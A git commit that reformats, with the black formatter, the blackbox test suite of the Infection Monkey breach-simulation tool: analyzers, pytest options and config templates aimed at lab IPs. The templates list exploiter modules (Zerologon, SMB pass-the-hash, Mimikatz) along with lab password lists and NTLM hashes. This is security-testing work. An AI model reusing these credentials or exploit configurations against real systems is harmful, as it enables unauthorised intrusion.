forked from p15670423/monkey
Reformat all python with black v20.8b1
This commit is contained in:
parent
7343b50135
commit
c40f7bf6c9
|
@ -2,7 +2,6 @@ from abc import ABCMeta, abstractmethod
|
||||||
|
|
||||||
|
|
||||||
class Analyzer(object, metaclass=ABCMeta):
|
class Analyzer(object, metaclass=ABCMeta):
|
||||||
|
|
||||||
@abstractmethod
|
@abstractmethod
|
||||||
def analyze_test_results(self) -> bool:
|
def analyze_test_results(self) -> bool:
|
||||||
raise NotImplementedError()
|
raise NotImplementedError()
|
||||||
|
|
|
@ -2,7 +2,6 @@ LOG_INIT_MESSAGE = "Analysis didn't run."
|
||||||
|
|
||||||
|
|
||||||
class AnalyzerLog(object):
|
class AnalyzerLog(object):
|
||||||
|
|
||||||
def __init__(self, analyzer_name):
|
def __init__(self, analyzer_name):
|
||||||
self.contents = LOG_INIT_MESSAGE
|
self.contents = LOG_INIT_MESSAGE
|
||||||
self.name = analyzer_name
|
self.name = analyzer_name
|
||||||
|
|
|
@ -3,7 +3,6 @@ from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
|
||||||
|
|
||||||
|
|
||||||
class CommunicationAnalyzer(Analyzer):
|
class CommunicationAnalyzer(Analyzer):
|
||||||
|
|
||||||
def __init__(self, island_client, machine_ips):
|
def __init__(self, island_client, machine_ips):
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
self.machine_ips = machine_ips
|
self.machine_ips = machine_ips
|
||||||
|
@ -21,5 +20,5 @@ class CommunicationAnalyzer(Analyzer):
|
||||||
return all_monkeys_communicated
|
return all_monkeys_communicated
|
||||||
|
|
||||||
def did_monkey_communicate_back(self, machine_ip):
|
def did_monkey_communicate_back(self, machine_ip):
|
||||||
query = {'ip_addresses': {'$elemMatch': {'$eq': machine_ip}}}
|
query = {"ip_addresses": {"$elemMatch": {"$eq": machine_ip}}}
|
||||||
return len(self.island_client.find_monkeys_in_db(query)) > 0
|
return len(self.island_client.find_monkeys_in_db(query)) > 0
|
||||||
|
|
|
@ -9,8 +9,9 @@ LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class PerformanceAnalyzer(Analyzer):
|
class PerformanceAnalyzer(Analyzer):
|
||||||
|
def __init__(
|
||||||
def __init__(self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]):
|
self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]
|
||||||
|
):
|
||||||
self.performance_test_config = performance_test_config
|
self.performance_test_config = performance_test_config
|
||||||
self.endpoint_timings = endpoint_timings
|
self.endpoint_timings = endpoint_timings
|
||||||
|
|
||||||
|
|
|
@ -3,19 +3,25 @@ from pprint import pformat
|
||||||
|
|
||||||
import dpath.util
|
import dpath.util
|
||||||
|
|
||||||
from common.config_value_paths import USER_LIST_PATH, PASSWORD_LIST_PATH, NTLM_HASH_LIST_PATH, LM_HASH_LIST_PATH
|
from common.config_value_paths import (
|
||||||
|
USER_LIST_PATH,
|
||||||
|
PASSWORD_LIST_PATH,
|
||||||
|
NTLM_HASH_LIST_PATH,
|
||||||
|
LM_HASH_LIST_PATH,
|
||||||
|
)
|
||||||
from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
|
from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
|
||||||
from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
|
from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
|
||||||
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
|
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
|
||||||
|
|
||||||
# Query for telemetry collection to see if password restoration was successful
|
# Query for telemetry collection to see if password restoration was successful
|
||||||
TELEM_QUERY = {'telem_category': 'exploit',
|
TELEM_QUERY = {
|
||||||
'data.exploiter': 'ZerologonExploiter',
|
"telem_category": "exploit",
|
||||||
'data.info.password_restored': True}
|
"data.exploiter": "ZerologonExploiter",
|
||||||
|
"data.info.password_restored": True,
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
class ZerologonAnalyzer(Analyzer):
|
class ZerologonAnalyzer(Analyzer):
|
||||||
|
|
||||||
def __init__(self, island_client: MonkeyIslandClient, expected_credentials: List[str]):
|
def __init__(self, island_client: MonkeyIslandClient, expected_credentials: List[str]):
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
self.expected_credentials = expected_credentials
|
self.expected_credentials = expected_credentials
|
||||||
|
@ -35,13 +41,12 @@ class ZerologonAnalyzer(Analyzer):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _get_relevant_credentials(config: dict):
|
def _get_relevant_credentials(config: dict):
|
||||||
credentials_on_island = []
|
credentials_on_island = []
|
||||||
credentials_on_island.extend(dpath.util.get(config['configuration'], USER_LIST_PATH))
|
credentials_on_island.extend(dpath.util.get(config["configuration"], USER_LIST_PATH))
|
||||||
credentials_on_island.extend(dpath.util.get(config['configuration'], NTLM_HASH_LIST_PATH))
|
credentials_on_island.extend(dpath.util.get(config["configuration"], NTLM_HASH_LIST_PATH))
|
||||||
credentials_on_island.extend(dpath.util.get(config['configuration'], LM_HASH_LIST_PATH))
|
credentials_on_island.extend(dpath.util.get(config["configuration"], LM_HASH_LIST_PATH))
|
||||||
return credentials_on_island
|
return credentials_on_island
|
||||||
|
|
||||||
def _is_all_credentials_in_list(self,
|
def _is_all_credentials_in_list(self, all_creds: List[str]) -> bool:
|
||||||
all_creds: List[str]) -> bool:
|
|
||||||
credentials_missing = [cred for cred in self.expected_credentials if cred not in all_creds]
|
credentials_missing = [cred for cred in self.expected_credentials if cred not in all_creds]
|
||||||
self._log_creds_not_gathered(credentials_missing)
|
self._log_creds_not_gathered(credentials_missing)
|
||||||
return not credentials_missing
|
return not credentials_missing
|
||||||
|
@ -60,11 +65,13 @@ class ZerologonAnalyzer(Analyzer):
|
||||||
|
|
||||||
def _log_credential_restore(self, telem_list: List[dict]):
|
def _log_credential_restore(self, telem_list: List[dict]):
|
||||||
if telem_list:
|
if telem_list:
|
||||||
self.log.add_entry("Zerologon exploiter telemetry contains indicators that credentials "
|
self.log.add_entry(
|
||||||
"were successfully restored.")
|
"Zerologon exploiter telemetry contains indicators that credentials "
|
||||||
|
"were successfully restored."
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
self.log.add_entry("Credential restore failed or credential restore "
|
self.log.add_entry(
|
||||||
"telemetry not found on the Monkey Island.")
|
"Credential restore failed or credential restore "
|
||||||
|
"telemetry not found on the Monkey Island."
|
||||||
|
)
|
||||||
self.log.add_entry(f"Query for credential restore telem: {pformat(TELEM_QUERY)}")
|
self.log.add_entry(f"Query for credential restore telem: {pformat(TELEM_QUERY)}")
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -8,7 +8,9 @@ class BaseTemplate(ConfigTemplate):
|
||||||
"basic.exploiters.exploiter_classes": [],
|
"basic.exploiters.exploiter_classes": [],
|
||||||
"basic_network.scope.local_network_scan": False,
|
"basic_network.scope.local_network_scan": False,
|
||||||
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
|
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
|
||||||
"internal.monkey.system_info.system_info_collector_classes":
|
"internal.monkey.system_info.system_info_collector_classes": [
|
||||||
["EnvironmentCollector", "HostnameCollector"],
|
"EnvironmentCollector",
|
||||||
"monkey.post_breach.post_breach_actions": []
|
"HostnameCollector",
|
||||||
|
],
|
||||||
|
"monkey.post_breach.post_breach_actions": [],
|
||||||
}
|
}
|
||||||
|
|
|
@ -2,7 +2,6 @@ from abc import ABC, abstractmethod
|
||||||
|
|
||||||
|
|
||||||
class ConfigTemplate(ABC):
|
class ConfigTemplate(ABC):
|
||||||
|
|
||||||
@property
|
@property
|
||||||
@abstractmethod
|
@abstractmethod
|
||||||
def config_values(self) -> dict:
|
def config_values(self) -> dict:
|
||||||
|
|
|
@ -7,8 +7,10 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
|
||||||
class Drupal(ConfigTemplate):
|
class Drupal(ConfigTemplate):
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
|
{
|
||||||
"basic.exploiters.exploiter_classes": ["DrupalExploiter"],
|
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.28"]
|
"basic.exploiters.exploiter_classes": ["DrupalExploiter"],
|
||||||
})
|
"basic_network.scope.subnet_scan_list": ["10.2.2.28"],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -8,8 +8,10 @@ class Elastic(ConfigTemplate):
|
||||||
|
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"],
|
{
|
||||||
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"],
|
"basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"],
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"]
|
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"],
|
||||||
})
|
"basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -8,7 +8,9 @@ class Hadoop(ConfigTemplate):
|
||||||
|
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["HadoopExploiter"],
|
{
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"]
|
"basic.exploiters.exploiter_classes": ["HadoopExploiter"],
|
||||||
})
|
"basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -7,14 +7,16 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
|
||||||
class Mssql(ConfigTemplate):
|
class Mssql(ConfigTemplate):
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["MSSQLExploiter"],
|
{
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.16"],
|
"basic.exploiters.exploiter_classes": ["MSSQLExploiter"],
|
||||||
"basic.credentials.exploit_password_list": ["Password1!",
|
"basic_network.scope.subnet_scan_list": ["10.2.2.16"],
|
||||||
"Xk8VDTsC",
|
"basic.credentials.exploit_password_list": [
|
||||||
"password",
|
"Password1!",
|
||||||
"12345678"],
|
"Xk8VDTsC",
|
||||||
"basic.credentials.exploit_user_list": ["Administrator",
|
"password",
|
||||||
"m0nk3y",
|
"12345678",
|
||||||
"user"]
|
],
|
||||||
})
|
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -3,52 +3,60 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
|
||||||
|
|
||||||
class Performance(ConfigTemplate):
|
class Performance(ConfigTemplate):
|
||||||
config_values = {
|
config_values = {
|
||||||
"basic.credentials.exploit_password_list": ["Xk8VDTsC",
|
"basic.credentials.exploit_password_list": [
|
||||||
"^NgDvY59~8",
|
"Xk8VDTsC",
|
||||||
"Ivrrw5zEzs",
|
"^NgDvY59~8",
|
||||||
"3Q=(Ge(+&w]*",
|
"Ivrrw5zEzs",
|
||||||
"`))jU7L(w}",
|
"3Q=(Ge(+&w]*",
|
||||||
"t67TC5ZDmz"],
|
"`))jU7L(w}",
|
||||||
|
"t67TC5ZDmz",
|
||||||
|
],
|
||||||
"basic.credentials.exploit_user_list": ["m0nk3y"],
|
"basic.credentials.exploit_user_list": ["m0nk3y"],
|
||||||
"basic.exploiters.exploiter_classes": ["SmbExploiter",
|
"basic.exploiters.exploiter_classes": [
|
||||||
"WmiExploiter",
|
"SmbExploiter",
|
||||||
"SSHExploiter",
|
"WmiExploiter",
|
||||||
"ShellShockExploiter",
|
"SSHExploiter",
|
||||||
"SambaCryExploiter",
|
"ShellShockExploiter",
|
||||||
"ElasticGroovyExploiter",
|
"SambaCryExploiter",
|
||||||
"Struts2Exploiter",
|
"ElasticGroovyExploiter",
|
||||||
"WebLogicExploiter",
|
"Struts2Exploiter",
|
||||||
"HadoopExploiter",
|
"WebLogicExploiter",
|
||||||
"VSFTPDExploiter",
|
"HadoopExploiter",
|
||||||
"MSSQLExploiter",
|
"VSFTPDExploiter",
|
||||||
"ZerologonExploiter"],
|
"MSSQLExploiter",
|
||||||
"basic_network.network_analysis.inaccessible_subnets": ["10.2.2.0/30",
|
"ZerologonExploiter",
|
||||||
"10.2.2.8/30",
|
],
|
||||||
"10.2.2.24/32",
|
"basic_network.network_analysis.inaccessible_subnets": [
|
||||||
"10.2.2.23/32",
|
"10.2.2.0/30",
|
||||||
"10.2.2.21/32",
|
"10.2.2.8/30",
|
||||||
"10.2.2.19/32",
|
"10.2.2.24/32",
|
||||||
"10.2.2.18/32",
|
"10.2.2.23/32",
|
||||||
"10.2.2.17/32"],
|
"10.2.2.21/32",
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.2",
|
"10.2.2.19/32",
|
||||||
"10.2.2.3",
|
"10.2.2.18/32",
|
||||||
"10.2.2.4",
|
"10.2.2.17/32",
|
||||||
"10.2.2.5",
|
],
|
||||||
"10.2.2.8",
|
"basic_network.scope.subnet_scan_list": [
|
||||||
"10.2.2.9",
|
"10.2.2.2",
|
||||||
"10.2.1.10",
|
"10.2.2.3",
|
||||||
"10.2.0.11",
|
"10.2.2.4",
|
||||||
"10.2.0.12",
|
"10.2.2.5",
|
||||||
"10.2.2.11",
|
"10.2.2.8",
|
||||||
"10.2.2.12",
|
"10.2.2.9",
|
||||||
"10.2.2.14",
|
"10.2.1.10",
|
||||||
"10.2.2.15",
|
"10.2.0.11",
|
||||||
"10.2.2.16",
|
"10.2.0.12",
|
||||||
"10.2.2.18",
|
"10.2.2.11",
|
||||||
"10.2.2.19",
|
"10.2.2.12",
|
||||||
"10.2.2.20",
|
"10.2.2.14",
|
||||||
"10.2.2.21",
|
"10.2.2.15",
|
||||||
"10.2.2.23",
|
"10.2.2.16",
|
||||||
"10.2.2.24",
|
"10.2.2.18",
|
||||||
"10.2.2.25"]
|
"10.2.2.19",
|
||||||
|
"10.2.2.20",
|
||||||
|
"10.2.2.21",
|
||||||
|
"10.2.2.23",
|
||||||
|
"10.2.2.24",
|
||||||
|
"10.2.2.25",
|
||||||
|
],
|
||||||
}
|
}
|
||||||
|
|
|
@ -7,7 +7,9 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
|
||||||
class ShellShock(ConfigTemplate):
|
class ShellShock(ConfigTemplate):
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
|
{
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.8"]
|
"basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
|
||||||
})
|
"basic_network.scope.subnet_scan_list": ["10.2.2.8"],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -7,14 +7,18 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
|
||||||
class SmbMimikatz(ConfigTemplate):
|
class SmbMimikatz(ConfigTemplate):
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["SmbExploiter"],
|
{
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
|
"basic.exploiters.exploiter_classes": ["SmbExploiter"],
|
||||||
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
|
"basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
|
||||||
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
|
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
|
||||||
"internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
|
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
|
||||||
"monkey.system_info.system_info_collector_classes": ["EnvironmentCollector",
|
"internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
|
||||||
"HostnameCollector",
|
"monkey.system_info.system_info_collector_classes": [
|
||||||
"ProcessListCollector",
|
"EnvironmentCollector",
|
||||||
"MimikatzCollector"]
|
"HostnameCollector",
|
||||||
})
|
"ProcessListCollector",
|
||||||
|
"MimikatzCollector",
|
||||||
|
],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -11,12 +11,10 @@ class SmbPth(ConfigTemplate):
|
||||||
"basic.exploiters.exploiter_classes": ["SmbExploiter"],
|
"basic.exploiters.exploiter_classes": ["SmbExploiter"],
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.15"],
|
"basic_network.scope.subnet_scan_list": ["10.2.2.15"],
|
||||||
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
|
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
|
||||||
"basic.credentials.exploit_user_list": ["Administrator",
|
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
|
||||||
"m0nk3y",
|
"internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
|
||||||
"user"],
|
"internal.classes.exploits.exploit_ntlm_hash_list": [
|
||||||
"internal.classes.finger_classes": ["SMBFinger",
|
"5da0889ea2081aa79f6852294cba4a5e",
|
||||||
"PingScanner",
|
"50c9987a6bf1ac59398df9f911122c9b",
|
||||||
"HTTPFinger"],
|
],
|
||||||
"internal.classes.exploits.exploit_ntlm_hash_list": ["5da0889ea2081aa79f6852294cba4a5e",
|
|
||||||
"50c9987a6bf1ac59398df9f911122c9b"]
|
|
||||||
}
|
}
|
||||||
|
|
|
@ -7,17 +7,12 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
|
||||||
class Ssh(ConfigTemplate):
|
class Ssh(ConfigTemplate):
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["SSHExploiter"],
|
{
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.11",
|
"basic.exploiters.exploiter_classes": ["SSHExploiter"],
|
||||||
"10.2.2.12"],
|
"basic_network.scope.subnet_scan_list": ["10.2.2.11", "10.2.2.12"],
|
||||||
"basic.credentials.exploit_password_list": ["Password1!",
|
"basic.credentials.exploit_password_list": ["Password1!", "12345678", "^NgDvY59~8"],
|
||||||
"12345678",
|
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
|
||||||
"^NgDvY59~8"],
|
"internal.classes.finger_classes": ["SSHFinger", "PingScanner", "HTTPFinger"],
|
||||||
"basic.credentials.exploit_user_list": ["Administrator",
|
}
|
||||||
"m0nk3y",
|
)
|
||||||
"user"],
|
|
||||||
"internal.classes.finger_classes": ["SSHFinger",
|
|
||||||
"PingScanner",
|
|
||||||
"HTTPFinger"]
|
|
||||||
})
|
|
||||||
|
|
|
@ -8,7 +8,9 @@ class Struts2(ConfigTemplate):
|
||||||
|
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
|
{
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"]
|
"basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
|
||||||
})
|
"basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -7,27 +7,30 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
|
||||||
class Tunneling(ConfigTemplate):
|
class Tunneling(ConfigTemplate):
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["SmbExploiter",
|
{
|
||||||
"WmiExploiter",
|
"basic.exploiters.exploiter_classes": ["SmbExploiter", "WmiExploiter", "SSHExploiter"],
|
||||||
"SSHExploiter"
|
"basic_network.scope.subnet_scan_list": [
|
||||||
],
|
"10.2.2.9",
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.9",
|
"10.2.1.10",
|
||||||
"10.2.1.10",
|
"10.2.0.11",
|
||||||
"10.2.0.11",
|
"10.2.0.12",
|
||||||
"10.2.0.12"],
|
],
|
||||||
"basic_network.scope.depth": 3,
|
"basic_network.scope.depth": 3,
|
||||||
"internal.general.keep_tunnel_open_time": 180,
|
"internal.general.keep_tunnel_open_time": 180,
|
||||||
"basic.credentials.exploit_password_list": ["Password1!",
|
"basic.credentials.exploit_password_list": [
|
||||||
"3Q=(Ge(+&w]*",
|
"Password1!",
|
||||||
"`))jU7L(w}",
|
"3Q=(Ge(+&w]*",
|
||||||
"t67TC5ZDmz",
|
"`))jU7L(w}",
|
||||||
"12345678"],
|
"t67TC5ZDmz",
|
||||||
"basic.credentials.exploit_user_list": ["Administrator",
|
"12345678",
|
||||||
"m0nk3y",
|
],
|
||||||
"user"],
|
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
|
||||||
"internal.classes.finger_classes": ["SSHFinger",
|
"internal.classes.finger_classes": [
|
||||||
"PingScanner",
|
"SSHFinger",
|
||||||
"HTTPFinger",
|
"PingScanner",
|
||||||
"SMBFinger"]
|
"HTTPFinger",
|
||||||
})
|
"SMBFinger",
|
||||||
|
],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -8,7 +8,9 @@ class Weblogic(ConfigTemplate):
|
||||||
|
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["WebLogicExploiter"],
|
{
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"]
|
"basic.exploiters.exploiter_classes": ["WebLogicExploiter"],
|
||||||
})
|
"basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -7,17 +7,17 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
|
||||||
class WmiMimikatz(ConfigTemplate):
|
class WmiMimikatz(ConfigTemplate):
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["WmiExploiter"],
|
{
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.14",
|
"basic.exploiters.exploiter_classes": ["WmiExploiter"],
|
||||||
"10.2.2.15"],
|
"basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
|
||||||
"basic.credentials.exploit_password_list": ["Password1!",
|
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
|
||||||
"Ivrrw5zEzs"],
|
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
|
||||||
"basic.credentials.exploit_user_list": ["Administrator",
|
"monkey.system_info.system_info_collector_classes": [
|
||||||
"m0nk3y",
|
"EnvironmentCollector",
|
||||||
"user"],
|
"HostnameCollector",
|
||||||
"monkey.system_info.system_info_collector_classes": ["EnvironmentCollector",
|
"ProcessListCollector",
|
||||||
"HostnameCollector",
|
"MimikatzCollector",
|
||||||
"ProcessListCollector",
|
],
|
||||||
"MimikatzCollector"]
|
}
|
||||||
})
|
)
|
||||||
|
|
|
@ -8,9 +8,11 @@ class Zerologon(ConfigTemplate):
|
||||||
|
|
||||||
config_values = copy(BaseTemplate.config_values)
|
config_values = copy(BaseTemplate.config_values)
|
||||||
|
|
||||||
config_values.update({
|
config_values.update(
|
||||||
"basic.exploiters.exploiter_classes": ["ZerologonExploiter"],
|
{
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.25"],
|
"basic.exploiters.exploiter_classes": ["ZerologonExploiter"],
|
||||||
# Empty list to make sure ZeroLogon adds "Administrator" username
|
"basic_network.scope.subnet_scan_list": ["10.2.2.25"],
|
||||||
"basic.credentials.exploit_user_list": []
|
# Empty list to make sure ZeroLogon adds "Administrator" username
|
||||||
})
|
"basic.credentials.exploit_user_list": [],
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
|
@ -2,25 +2,37 @@ import pytest
|
||||||
|
|
||||||
|
|
||||||
def pytest_addoption(parser):
|
def pytest_addoption(parser):
|
||||||
parser.addoption("--island", action="store", default="",
|
parser.addoption(
|
||||||
help="Specify the Monkey Island address (host+port).")
|
"--island",
|
||||||
parser.addoption("--no-gcp", action="store_true", default=False,
|
action="store",
|
||||||
help="Use for no interaction with the cloud.")
|
default="",
|
||||||
parser.addoption("--quick-performance-tests", action="store_true", default=False,
|
help="Specify the Monkey Island address (host+port).",
|
||||||
help="If enabled performance tests won't reset island and won't send telemetries, "
|
)
|
||||||
"instead will just test performance of already present island state.")
|
parser.addoption(
|
||||||
|
"--no-gcp",
|
||||||
|
action="store_true",
|
||||||
|
default=False,
|
||||||
|
help="Use for no interaction with the cloud.",
|
||||||
|
)
|
||||||
|
parser.addoption(
|
||||||
|
"--quick-performance-tests",
|
||||||
|
action="store_true",
|
||||||
|
default=False,
|
||||||
|
help="If enabled performance tests won't reset island and won't send telemetries, "
|
||||||
|
"instead will just test performance of already present island state.",
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture(scope='session')
|
@pytest.fixture(scope="session")
|
||||||
def island(request):
|
def island(request):
|
||||||
return request.config.getoption("--island")
|
return request.config.getoption("--island")
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture(scope='session')
|
@pytest.fixture(scope="session")
|
||||||
def no_gcp(request):
|
def no_gcp(request):
|
||||||
return request.config.getoption("--no-gcp")
|
return request.config.getoption("--no-gcp")
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture(scope='session')
|
@pytest.fixture(scope="session")
|
||||||
def quick_performance_tests(request):
|
def quick_performance_tests(request):
|
||||||
return request.config.getoption("--quick-performance-tests")
|
return request.config.getoption("--quick-performance-tests")
|
||||||
|
|
|
@ -8,23 +8,22 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
|
||||||
|
|
||||||
|
|
||||||
class IslandConfigParser:
|
class IslandConfigParser:
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_raw_config(config_template: Type[ConfigTemplate],
|
def get_raw_config(
|
||||||
island_client: MonkeyIslandClient) -> str:
|
config_template: Type[ConfigTemplate], island_client: MonkeyIslandClient
|
||||||
|
) -> str:
|
||||||
response = island_client.get_config()
|
response = island_client.get_config()
|
||||||
config = IslandConfigParser.apply_template_to_config(config_template, response['configuration'])
|
config = IslandConfigParser.apply_template_to_config(
|
||||||
|
config_template, response["configuration"]
|
||||||
|
)
|
||||||
return json.dumps(config)
|
return json.dumps(config)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def apply_template_to_config(config_template: Type[ConfigTemplate],
|
def apply_template_to_config(config_template: Type[ConfigTemplate], config: dict) -> dict:
|
||||||
config: dict) -> dict:
|
|
||||||
for path, value in config_template.config_values.items():
|
for path, value in config_template.config_values.items():
|
||||||
dpath.util.set(config, path, value, '.')
|
dpath.util.set(config, path, value, ".")
|
||||||
return config
|
return config
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_ips_of_targets(raw_config):
|
def get_ips_of_targets(raw_config):
|
||||||
return dpath.util.get(json.loads(raw_config),
|
return dpath.util.get(json.loads(raw_config), "basic_network.scope.subnet_scan_list", ".")
|
||||||
"basic_network.scope.subnet_scan_list",
|
|
||||||
'.')
|
|
||||||
|
|
|
@ -8,9 +8,9 @@ from bson import json_util
|
||||||
from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests
|
from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests
|
||||||
|
|
||||||
SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5
|
SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5
|
||||||
MONKEY_TEST_ENDPOINT = 'api/test/monkey'
|
MONKEY_TEST_ENDPOINT = "api/test/monkey"
|
||||||
TELEMETRY_TEST_ENDPOINT = 'api/test/telemetry'
|
TELEMETRY_TEST_ENDPOINT = "api/test/telemetry"
|
||||||
LOG_TEST_ENDPOINT = 'api/test/log'
|
LOG_TEST_ENDPOINT = "api/test/log"
|
||||||
LOGGER = logging.getLogger(__name__)
|
